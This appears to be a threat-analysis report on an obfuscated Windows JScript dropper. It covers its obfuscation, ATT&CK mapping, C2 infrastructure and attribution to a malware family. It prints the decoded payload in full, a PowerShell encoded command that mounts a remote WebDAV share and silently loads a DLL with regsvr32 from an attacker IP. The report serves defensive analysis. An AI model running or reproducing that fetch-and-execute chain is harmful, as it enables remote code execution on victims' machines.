SHA-256:
8ac4b873a5178bc3a3de28166e1e020aa6b49e2748f5cd1a30b4e3fc9ae67423Analysis — 8ac4b873a5178bc3a3de28166e1e020aa6b49e2748f5cd1a30b4e3fc9ae67423
Sample: 280262701465664713.js ^[triage.json]
Size: 80,589 bytes ^[triage.json]
Family: unclassified-js-webdav-dropper (99th confirmed sibling)
Build / RE
- Language: JScript (Windows Script Host) delivered as
.js. ^[file.txt] - Obfuscation: Pure-JScript noise-variable concatenation obfuscation. 64 unique identifiers with random lowercase noise names (12–16 chars, no semantic content), assigned single-character values via semicolon-delimited
var=...statements, then concatenated via+inside nestedFunction("return this")()constructors to build and execute the payload. Total assignments: 197 (64 unique identifiers, ~3:1 reassignment ratio, last-wins semantics). No dictionary lookup table, no batch/polyglot layer, no self-replication. ^[strings.txt] ^[floss.txt] - Assembly engine:
Function("return this")()["WScript"]["CreateObject"]("WScript.Shell")["run"](...). ^[floss.txt] - Anti-analysis:
timeout 1anti-emulation gate inside the PowerShell wrapper (delays execution beforenet use). No debugger checks, no VM detection. ^[dynamic-analysis.md] - Code quality: Low — hand-written, verbose, repetitive noise-variable obfuscation without commercial obfuscator signatures.
Deploy / ATT&CK
Decoded cleartext payload (static reconstruction via tokenized variable substitution):
powershell -EncodedCommand dABpAG0AZQBvAHUAdAAgADEAOwBlAGUAZQB1AGEAagBqAHcAawBhADsAbgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4AMgAwADQAQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADsAcwBlAG4AcABrAHMAZAB1AHAAeQBpAHkAawBjADsAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcADkANAAuADEANQA5AC4AMQAxADMALgAyADAANABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQA3ADAAOAAzADIAMgA3ADUANgA4ADgAOQAuAGQAbABsADsAawBjAG0AYQB5AG8AaQBqAGUAYQB3AA==
which decodes (UTF-16LE) to:
timeout 1;eeeuajjwka;net use \\94.159.113.204@8888\davwwwroot\;senpksdupyiykc;regsvr32 /s \\94.159.113.204@8888\davwwwroot\1708322756889.dll;kcmayoijeaw
| Tactic | Technique | Evidence |
|---|---|---|
| Execution | T1059.005 (Visual Basic / JScript) | .js file opened by user; WScript host ^[file.txt] |
| Execution | T1059.001 (PowerShell) | powershell.exe -EncodedCommand wrapper ^[floss.txt] |
| Execution | T1218.010 (Regsvr32) | regsvr32 /s \\94.159.113.204@8888\davwwwroot\1708322756889.dll ^[floss.txt] |
| Defense Evasion | T1218 (System Binary Proxy Execution) | wscript.exe → powershell.exe → regsvr32.exe proxy chain ^[floss.txt] |
| Defense Evasion | T1027 (Obfuscated Files or Information) | Noise-variable concatenation obfuscation (64 entries, 197 assignments) ^[strings.txt] |
| Defense Evasion | T1497.001 (Time-Based Evasion) | timeout 1 anti-emulation gate inside PowerShell wrapper ^[dynamic-analysis.md] |
| Command & Control | T1071.001 (Web Protocols) | WebDAV over HTTP (\\94.159.113.204@8888\davwwwroot\) ^[floss.txt] |
| Command & Control | T1105 (Ingress Tool Transfer) | net use mounts WebDAV share; regsvr32 fetches and loads remote DLL ^[floss.txt] |
C2 infrastructure: 94.159.113.204:8888 — same C2 subnet as siblings fa8c6d74 (65th, .204), ddf0c8bd (80th, .204), edfb0e0a (85th, .204), 82d78891aa (93rd, .204), and 771c8752 (90th, .204). ^[entities/unclassified-js-webdav-dropper.md]
Payload: 1708322756889.dll — registered silently via regsvr32 /s.
Dynamic Analysis
CAPE skipped — ASCII text with very long lines is not a supported binary class for detonation. ^[dynamic-analysis.md]
Attribution
- Family: unclassified-js-webdav-dropper — 99th confirmed sibling.
- Confidence: High — identical execution engine (
Function("return this")()→WScript.Shell.run()→ PowerShell-EncodedCommand→net use+regsvr32 /s), same C2 subnet (94.159.113.204:8888), same noise-variable concatenation dialect (64 entries). - No new technique — falls within established
noise-variable-jscript-concatenation-65-entrycapability cluster (same dialect asfa8c6d74,ddf0c8bd,edfb0e0a,82d78891aa).